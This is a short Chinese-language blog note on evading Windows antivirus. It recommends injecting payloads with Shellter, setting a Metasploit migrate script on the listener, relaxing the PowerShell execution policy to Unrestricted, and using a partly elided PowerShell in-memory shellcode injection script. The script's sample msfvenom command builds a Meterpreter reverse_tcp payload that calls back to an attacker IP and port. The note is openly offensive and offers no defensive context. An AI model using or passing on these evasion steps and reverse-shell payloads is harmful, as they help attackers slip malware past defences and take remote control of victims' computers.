Windows下免杀的简单技巧

发布于 2023-03-07 | 分类于 Notes | 1分钟 | 118字数

记录文

shellter

apt install wine
apt install shellter
# 剩下的自己摸索，没多难

最后用msf监听的的时候需要设置：set AutoRunScript post/windows/manage/migrate 用于转移进程

通过PowerShell进行内存注入

比较隐蔽

查看并设置执行限制

Get-ExecutionPolicy -Scope CurrentUser
Undefined

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Get-ExecutionPolicy -Scope CurrentUser
Unrestricted

脚本代码

......
[Byte[]];
[Byte[]]$sc = <place your shellcode here>; # 示例shellCode：msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell
......

下载猛戳

本文作者： 晨曦 · Chenxi
本文链接： https://chenxi.in/post/wxmsdjdjq/
版权声明： All posts on this blog are licensed under the BY-NC-SA license unless otherwise stated. Please cite the source for reprinting :-)

# Notes

Active Directory攻击上一篇

关于端口转发和隧道的一些记录下一篇

shellter

通过PowerShell进行内存注入

查看并设置执行限制

脚本代码

感谢您的支持，我会继续努力的!